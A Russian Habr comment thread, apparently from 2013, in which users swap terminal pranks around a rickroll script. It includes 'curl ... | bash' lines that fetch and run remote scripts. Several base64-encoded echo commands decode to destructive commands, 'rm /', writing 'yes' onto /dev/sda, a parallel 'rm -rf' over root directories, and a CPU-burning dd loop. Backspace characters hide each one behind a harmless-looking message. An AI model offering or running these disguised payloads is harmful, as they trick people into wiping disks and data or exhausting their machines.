@ValdikSS12 окт 2013 в 08:58

Never Gonna Give Your Terminal

1 мин

21K

Ненормальное программирование *

+41

Комментарии 48

@shara 12 окт 2013 в 09:08

curl -s http://pastebin.com/raw.php?i=Y3e86xQJ | bash

^_^

@ValdikSS 12 окт 2013 в 09:10

Злодейство.

@shara 12 окт 2013 в 09:18

Запускать скрипт выкачанный curl'ом — глупость.
Особенно, когда этот скрипт выкачивает другой скрипт, который пожат в трёхмегабайтный bz, который содержит 88мегабайтную(!) дикую кашу, которая показывает мультик. Честно-честно.

Да ещё откуда? С гитхаба, который может быть подменён в любой момент.

@ValdikSS 12 окт 2013 в 09:29

curl -s https://raw.github.com/keroserene/rickrollrc/master/roll.sh | sudo -u nobody bash

@shara 12 окт 2013 в 09:35

Да, так лучше, проапдейть. Хотя от кражи файлов не спасёт, если в домашней директории права на чтение у всех, что по дефолту во всех популярных системах, насколько знаю.

@Tranced 12 окт 2013 в 09:16

Аттеншн, патч Бармина!

@polyakov_andrey 12 окт 2013 в 09:17

@Indexator 12 окт 2013 в 09:22

Опять пропагандируете способы разные?

@DarkByte 12 окт 2013 в 09:45

Вот такой вариант поинтереснее будет:

`echo ZXZhbCBybSAvO2VjaG8gCAgICAgICAgICAgICAgIeWVzPi9kZXYvbnVsbDtlY2hvICdIYXZlIGEgbmljZSBkYXkuJwo=|base64 -d`

@shara 12 окт 2013 в 09:51

Я не настолько злыдень. Это реально может сойти за «выведи киску в терминале» и никто ничего не заподозрит.

rm /, кстати, не должен работать

@DarkByte 12 окт 2013 в 10:09

Вероятнее всего автор не задумывал ничего плохого, а просто хотел показать, каким образом можно обмануть тех, кто перед выполнением команды, всё таки решит проверить, и выполнит в терминале команду без бэк-тиков.

@leMar 12 окт 2013 в 12:15

Я думаю это можно было бы показать и мене устращающим способом. С другой стороны такой урок еще не скоро забудется.

@DarkByte 12 окт 2013 в 12:44

В случае с «rm /», который я привёл, жертва отделается лёгким испугом, без каких либо повреждений для системы :)

@alhimik45 12 окт 2013 в 09:51

А если так?

echo eWVzPi9kZXYvc2RhO2VjaG8gJ0hhdmUgYSBuaWNlIGRheS4nCg== | base64 -d

@DarkByte 12 окт 2013 в 09:53

Увы, но это уже не то, что задумывалось в оригинале.

@alhimik45 12 окт 2013 в 11:04

Ох чёрт, я купился)
А как вы это записали?

@DarkByte 12 окт 2013 в 12:46

Записал не я, но смысл в использовании символа backspace (код 08).

@GamePad64 12 окт 2013 в 09:57

Нужна поддержка многопоточности :)

@alhimik45 12 окт 2013 в 11:34

`echo ZXZhbCBmb3IgaSBpbiBgbHMgL2A7IGRvIChybSAtcmYgJGkgJik7IGRvbmUgOyAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICGVjaG8gIkhlbGxvLCB0aGlzIHNjcmlwdCBkb2VzIG5vdCBjb250YWluIGRhbmdlcm91cyI= | base64 -d`

Как-то так)

@GamePad64 12 окт 2013 в 22:41

Многопоточно, оставляет одно ядро:

`echo YT0vZGV2L3plcm87Yj0vZGV2L251bGw7Zm9yIGMgaW4gYHNlcSBcYGNhdCAvcHJvYy9jcHVpbmZvIHwgYXdrICcvXnByb2Nlc3Nvci97cHJpbnQgJDN9JyB8IHRhaWwgLTFcYGA7IGRvO2RkIGlmPSRhIG9mPSRiICY7ZG9uZQ== | base64 -d`

Одноядерные системы щадит, на них и так никакого удовольствия работать :)